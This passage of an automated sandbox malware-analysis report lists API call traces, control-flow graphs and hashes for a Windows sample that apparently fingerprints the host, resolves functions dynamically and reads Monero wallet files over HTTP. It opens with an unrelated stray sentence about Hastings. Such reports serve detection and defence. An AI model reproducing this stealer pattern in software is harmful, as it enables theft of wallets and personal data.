Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 67d5a7ff8b844a3cbca6447c9bf6c28e3a8f83b7a347986107ee2fd38ab57602
                                    • Instruction ID: bfa389ae86696d11ca1817148ec15a8b5866850fc9556b1331119be5d2337727
                                    • Opcode Fuzzy Hash: 67d5a7ff8b844a3cbca6447c9bf6c28e3a8f83b7a347986107ee2fd38ab57602
                                    • Instruction Fuzzy Hash: 704117686CA704EEE636B7F4ACE2EDF76A65F42708F5050C4E881526B2CFB069C14735

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 3662d0-36635b call 37aab0 call 364800 call 37aa50 InternetOpenA StrCmpCA 1040 366364-366368 1033->1040 1041 36635d 1033->1041 1042 36636e-366392 InternetConnectA 1040->1042 1043 366559-366575 call 37aab0 call 37ab10 * 2 1040->1043 1041->1040 1045 36654f-366553 InternetCloseHandle 1042->1045 1046 366398-36639c 1042->1046 1062 366578-36657d 1043->1062 1045->1043 1048 36639e-3663a8 1046->1048 1049 3663aa 1046->1049 1051 3663b4-3663e2 HttpOpenRequestA 1048->1051 1049->1051 1052 366545-366549 InternetCloseHandle 1051->1052 1053 3663e8-3663ec 1051->1053 1052->1045 1055 366415-366455 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 3663ee-36640f InternetSetOptionA 1053->1056 1058 366457-366477 call 37aa50 call 37ab10 * 2 1055->1058 1059 36647c-36649b call 378ad0 1055->1059 1056->1055 1058->1062 1067 36649d-3664a4 1059->1067 1068 366519-366539 call 37aa50 call 37ab10 * 2 1059->1068 1071 3664a6-3664d0 InternetReadFile 1067->1071 1072 366517-36653f InternetCloseHandle 1067->1072 1068->1062 1076 3664d2-3664d9 1071->1076 1077 3664db 1071->1077 1072->1052 1076->1077 1078 3664dd-366515 call 37acc0 call 37abb0 call 37ab10 1076->1078 1077->1072 1078->1071
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • InternetOpenA.WININET(00380DFF,00000001,00000000,00000000,00000000), ref: 00366331
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 003663D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0036640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00366421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0036644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003664BD
                                    • InternetCloseHandle.WININET(00000000), ref: 0036653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00366549
                                    • InternetCloseHandle.WININET(00000000), ref: 00366553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 5294354136d23e80c2bf6142013748df1c67fb80dd39f61311076ddc1afe0c89
                                    • Instruction ID: af5d08d6cadee8a1f61efc04ef956f318a4d5083816dbb860b9882ddcea4fbbc
                                    • Opcode Fuzzy Hash: 5294354136d23e80c2bf6142013748df1c67fb80dd39f61311076ddc1afe0c89
                                    • Instruction Fuzzy Hash: 1B714171A00218EBDB25DF94CC5AFEEB779BB44700F108198F60A6B194DBB56A84CF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 377690-3776da GetWindowsDirectoryA 1357 3776e3-377757 GetVolumeInformationA call 378e90 * 3 1356->1357 1358 3776dc 1356->1358 1365 377768-37776f 1357->1365 1358->1357 1366 377771-37778a call 378e90 1365->1366 1367 37778c-3777a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 3777a9-3777b6 call 37aa50 1367->1369 1370 3777b8-3777e8 wsprintfA call 37aa50 1367->1370 1377 37780e-37781e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003776D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0037779A
                                    • wsprintfA.USER32 ref: 003777D0
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 984bf6c855220a241639472dc920ee364e7385ca18b4694e0eac280c351fd3a8
                                    • Instruction ID: 98d3611ad26cc3369e174ae9404baacf73327ed4d42f6d0c25856d2044044114
                                    • Opcode Fuzzy Hash: 984bf6c855220a241639472dc920ee364e7385ca18b4694e0eac280c351fd3a8
                                    • Instruction Fuzzy Hash: B441A7B1D04348EBDB21DF94DC85BEEB7B8AF48704F104099F509AB280D7786B44CBA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00377A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 96d8f341a933a23603c31617f9cf3bba0aff75133b22c0b6a08d4000b9cd681f
                                    • Instruction ID: 9d72c432a0d9c64bc8d59d508b0ac07b249f01a91066de2456f2ea20fc2a8518
                                    • Opcode Fuzzy Hash: 96d8f341a933a23603c31617f9cf3bba0aff75133b22c0b6a08d4000b9cd681f
                                    • Instruction Fuzzy Hash: D2F04FB1D48209EBD710DF98DD45BAEBBB8EB05B11F10421AF615A2780C7B55600CBE1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: d961ea557126f44c6008c95705d85baef9bbfd78524f5e15bdcd0a60cf23b9a0
                                    • Instruction ID: c47bcd06407fcb8c6543086a2c3a9303e533312d17e2544211921b203c7b95b9
                                    • Opcode Fuzzy Hash: d961ea557126f44c6008c95705d85baef9bbfd78524f5e15bdcd0a60cf23b9a0
                                    • Instruction Fuzzy Hash: 64D05EB590430CABCB10DFE098496DDBB79BB08215F041554D90562240EA705451CAA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 379f20-379f2a 634 37a346-37a3da LoadLibraryA * 8 633->634 635 379f30-37a341 GetProcAddress * 43 633->635 636 37a456-37a45d 634->636 637 37a3dc-37a451 GetProcAddress * 5 634->637 635->634 638 37a526-37a52d 636->638 639 37a463-37a521 GetProcAddress * 8 636->639 637->636 640 37a52f-37a5a3 GetProcAddress * 5 638->640 641 37a5a8-37a5af 638->641 639->638 640->641 642 37a647-37a64e 641->642 643 37a5b5-37a642 GetProcAddress * 6 641->643 644 37a654-37a72a GetProcAddress * 9 642->644 645 37a72f-37a736 642->645 643->642 644->645 646 37a7b2-37a7b9 645->646 647 37a738-37a7ad GetProcAddress * 5 645->647 648 37a7ec-37a7f3 646->648 649 37a7bb-37a7e7 GetProcAddress * 2 646->649 647->646 650 37a825-37a82c 648->650 651 37a7f5-37a820 GetProcAddress * 2 648->651 649->648 652 37a922-37a929 650->652 653 37a832-37a91d GetProcAddress * 10 650->653 651->650 654 37a98d-37a994 652->654 655 37a92b-37a988 GetProcAddress * 4 652->655 653->652 656 37a996-37a9a9 GetProcAddress 654->656 657 37a9ae-37a9b5 654->657 655->654 656->657 658 37a9b7-37aa13 GetProcAddress * 4 657->658 659 37aa18-37aa19 657->659 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00F26640), ref: 00379F3D
                                    • GetProcAddress.KERNEL32(75900000,00F262E0), ref: 00379F55
                                    • GetProcAddress.KERNEL32(75900000,00F38F40), ref: 00379F6E
                                    • GetProcAddress.KERNEL32(75900000,00F38F88), ref: 00379F86
                                    • GetProcAddress.KERNEL32(75900000,00F3C9D0), ref: 00379F9E
                                    • GetProcAddress.KERNEL32(75900000,00F3C988), ref: 00379FB7
                                    • GetProcAddress.KERNEL32(75900000,00F2B4F0), ref: 00379FCF
                                    • GetProcAddress.KERNEL32(75900000,00F3C850), ref: 00379FE7
                                    • GetProcAddress.KERNEL32(75900000,00F3C9B8), ref: 0037A000
                                    • GetProcAddress.KERNEL32(75900000,00F3C970), ref: 0037A018
                                    • GetProcAddress.KERNEL32(75900000,00F3C9E8), ref: 0037A030
                                    • GetProcAddress.KERNEL32(75900000,00F26500), ref: 0037A049
                                    • GetProcAddress.KERNEL32(75900000,00F265C0), ref: 0037A061
                                    • GetProcAddress.KERNEL32(75900000,00F26320), ref: 0037A079
                                    • GetProcAddress.KERNEL32(75900000,00F26360), ref: 0037A092
                                    • GetProcAddress.KERNEL32(75900000,00F3CA60), ref: 0037A0AA
                                    • GetProcAddress.KERNEL32(75900000,00F3C928), ref: 0037A0C2
                                    • GetProcAddress.KERNEL32(75900000,00F2B540), ref: 0037A0DB
                                    • GetProcAddress.KERNEL32(75900000,00F26380), ref: 0037A0F3
                                    • GetProcAddress.KERNEL32(75900000,00F3C940), ref: 0037A10B
                                    • GetProcAddress.KERNEL32(75900000,00F3CA00), ref: 0037A124
                                    • GetProcAddress.KERNEL32(75900000,00F3C868), ref: 0037A13C
                                    • GetProcAddress.KERNEL32(75900000,00F3C880), ref: 0037A154
                                    • GetProcAddress.KERNEL32(75900000,00F26580), ref: 0037A16D
                                    • GetProcAddress.KERNEL32(75900000,00F3CA18), ref: 0037A185
                                    • GetProcAddress.KERNEL32(75900000,00F3C958), ref: 0037A19D
                                    • GetProcAddress.KERNEL32(75900000,00F3C8B0), ref: 0037A1B6
                                    • GetProcAddress.KERNEL32(75900000,00F3CAD8), ref: 0037A1CE
                                    • GetProcAddress.KERNEL32(75900000,00F3CA48), ref: 0037A1E6
                                    • GetProcAddress.KERNEL32(75900000,00F3C9A0), ref: 0037A1FF
                                    • GetProcAddress.KERNEL32(75900000,00F3CAC0), ref: 0037A217
                                    • GetProcAddress.KERNEL32(75900000,00F3C910), ref: 0037A22F
                                    • GetProcAddress.KERNEL32(75900000,00F3CA30), ref: 0037A248
                                    • GetProcAddress.KERNEL32(75900000,00F39918), ref: 0037A260
                                    • GetProcAddress.KERNEL32(75900000,00F3CA78), ref: 0037A278
                                    • GetProcAddress.KERNEL32(75900000,00F3CA90), ref: 0037A291
                                    • GetProcAddress.KERNEL32(75900000,00F263A0), ref: 0037A2A9
                                    • GetProcAddress.KERNEL32(75900000,00F3CAA8), ref: 0037A2C1
                                    • GetProcAddress.KERNEL32(75900000,00F26400), ref: 0037A2DA
                                    • GetProcAddress.KERNEL32(75900000,00F3C8F8), ref: 0037A2F2
                                    • GetProcAddress.KERNEL32(75900000,00F3C820), ref: 0037A30A
                                    • GetProcAddress.KERNEL32(75900000,00F26420), ref: 0037A323
                                    • GetProcAddress.KERNEL32(75900000,00F26440), ref: 0037A33B
                                    • LoadLibraryA.KERNEL32(00F3C7F0,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A34D
                                    • LoadLibraryA.KERNEL32(00F3C898,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A35E
                                    • LoadLibraryA.KERNEL32(00F3C808,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A370
                                    • LoadLibraryA.KERNEL32(00F3C838,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A382
                                    • LoadLibraryA.KERNEL32(00F3C8C8,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A393
                                    • LoadLibraryA.KERNEL32(00F3C8E0,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A3A5
                                    • LoadLibraryA.KERNEL32(00F3CBB0,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A3B7
                                    • LoadLibraryA.KERNEL32(00F3CD30,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A3C8
                                    • GetProcAddress.KERNEL32(75FD0000,00F26A20), ref: 0037A3EA
                                    • GetProcAddress.KERNEL32(75FD0000,00F3CDC0), ref: 0037A402
                                    • GetProcAddress.KERNEL32(75FD0000,00F38B40), ref: 0037A41A
                                    • GetProcAddress.KERNEL32(75FD0000,00F3CDD8), ref: 0037A433
                                    • GetProcAddress.KERNEL32(75FD0000,00F26740), ref: 0037A44B
                                    • GetProcAddress.KERNEL32(734B0000,00F2B298), ref: 0037A470
                                    • GetProcAddress.KERNEL32(734B0000,00F26840), ref: 0037A489
                                    • GetProcAddress.KERNEL32(734B0000,00F2B040), ref: 0037A4A1
                                    • GetProcAddress.KERNEL32(734B0000,00F3CD48), ref: 0037A4B9
                                    • GetProcAddress.KERNEL32(734B0000,00F3CBF8), ref: 0037A4D2
                                    • GetProcAddress.KERNEL32(734B0000,00F26900), ref: 0037A4EA
                                    • GetProcAddress.KERNEL32(734B0000,00F26860), ref: 0037A502
                                    • GetProcAddress.KERNEL32(734B0000,00F3CDA8), ref: 0037A51B
                                    • GetProcAddress.KERNEL32(763B0000,00F269A0), ref: 0037A53C
                                    • GetProcAddress.KERNEL32(763B0000,00F267E0), ref: 0037A554
                                    • GetProcAddress.KERNEL32(763B0000,00F3CCD0), ref: 0037A56D
                                    • GetProcAddress.KERNEL32(763B0000,00F3CCE8), ref: 0037A585
                                    • GetProcAddress.KERNEL32(763B0000,00F26760), ref: 0037A59D
                                    • GetProcAddress.KERNEL32(750F0000,00F2AEB0), ref: 0037A5C3
                                    • GetProcAddress.KERNEL32(750F0000,00F2AFC8), ref: 0037A5DB
                                    • GetProcAddress.KERNEL32(750F0000,00F3CAF0), ref: 0037A5F3
                                    • GetProcAddress.KERNEL32(750F0000,00F26940), ref: 0037A60C
                                    • GetProcAddress.KERNEL32(750F0000,00F26680), ref: 0037A624
                                    • GetProcAddress.KERNEL32(750F0000,00F2B248), ref: 0037A63C
                                    • GetProcAddress.KERNEL32(75A50000,00F3CB68), ref: 0037A662
                                    • GetProcAddress.KERNEL32(75A50000,00F26880), ref: 0037A67A
                                    • GetProcAddress.KERNEL32(75A50000,00F38B00), ref: 0037A692
                                    • GetProcAddress.KERNEL32(75A50000,00F3CB80), ref: 0037A6AB
                                    • GetProcAddress.KERNEL32(75A50000,00F3CD60), ref: 0037A6C3
                                    • GetProcAddress.KERNEL32(75A50000,00F269E0), ref: 0037A6DB
                                    • GetProcAddress.KERNEL32(75A50000,00F266A0), ref: 0037A6F4
                                    • GetProcAddress.KERNEL32(75A50000,00F3CD78), ref: 0037A70C
                                    • GetProcAddress.KERNEL32(75A50000,00F3CB08), ref: 0037A724
                                    • GetProcAddress.KERNEL32(75070000,00F266E0), ref: 0037A746
                                    • GetProcAddress.KERNEL32(75070000,00F3CCA0), ref: 0037A75E
                                    • GetProcAddress.KERNEL32(75070000,00F3CD18), ref: 0037A776
                                    • GetProcAddress.KERNEL32(75070000,00F3CC40), ref: 0037A78F
                                    • GetProcAddress.KERNEL32(75070000,00F3CB20), ref: 0037A7A7
                                    • GetProcAddress.KERNEL32(74E50000,00F26920), ref: 0037A7C8
                                    • GetProcAddress.KERNEL32(74E50000,00F269C0), ref: 0037A7E1
                                    • GetProcAddress.KERNEL32(75320000,00F268E0), ref: 0037A802
                                    • GetProcAddress.KERNEL32(75320000,00F3CB38), ref: 0037A81A
                                    • GetProcAddress.KERNEL32(6F280000,00F26960), ref: 0037A840
                                    • GetProcAddress.KERNEL32(6F280000,00F26980), ref: 0037A858
                                    • GetProcAddress.KERNEL32(6F280000,00F26A00), ref: 0037A870
                                    • GetProcAddress.KERNEL32(6F280000,00F3CD00), ref: 0037A889
                                    • GetProcAddress.KERNEL32(6F280000,00F268A0), ref: 0037A8A1
                                    • GetProcAddress.KERNEL32(6F280000,00F266C0), ref: 0037A8B9
                                    • GetProcAddress.KERNEL32(6F280000,00F26700), ref: 0037A8D2
                                    • GetProcAddress.KERNEL32(6F280000,00F26800), ref: 0037A8EA
                                    • GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 0037A901
                                    • GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 0037A917
                                    • GetProcAddress.KERNEL32(74E00000,00F3CB50), ref: 0037A939
                                    • GetProcAddress.KERNEL32(74E00000,00F38B10), ref: 0037A951
                                    • GetProcAddress.KERNEL32(74E00000,00F3CC28), ref: 0037A969
                                    • GetProcAddress.KERNEL32(74E00000,00F3CB98), ref: 0037A982
                                    • GetProcAddress.KERNEL32(74DF0000,00F268C0), ref: 0037A9A3
                                    • GetProcAddress.KERNEL32(6E080000,00F3CBC8), ref: 0037A9C4
                                    • GetProcAddress.KERNEL32(6E080000,00F26720), ref: 0037A9DD
                                    • GetProcAddress.KERNEL32(6E080000,00F3CBE0), ref: 0037A9F5
                                    • GetProcAddress.KERNEL32(6E080000,00F3CD90), ref: 0037AA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: fcd9323c52536ece990fcbe7c87a950764678745e03ce290901cf391b79bedcb
                                    • Instruction ID: 93617159f92baad12fcdbdc5546c86acd0ddeef067cb5f85316417244055db2f
                                    • Opcode Fuzzy Hash: fcd9323c52536ece990fcbe7c87a950764678745e03ce290901cf391b79bedcb
                                    • Instruction Fuzzy Hash: 50620DF6518204AFC364DFA8ED8895677FBE74D701318B61AB909C3A70D735AA40DBE0

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00364965
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 0036498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00364B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00380DDE,00000000,?,?,00000000,?,",00000000,?,00F3E4A0), ref: 00364E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00364E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00364E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00364E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00364EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00364F15
                                    • HttpOpenRequestA.WININET(00000000,00F3E500,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 00364B65
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00364F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: e9dd927ba5d8241795f7d7c448003f58d2ab1af21ea631acb10f15d4920f02b9
                                    • Instruction ID: d7ff792c163fd6151f141fbe7fec76c521167e5fb8a7ac334c62bb4eca51f954
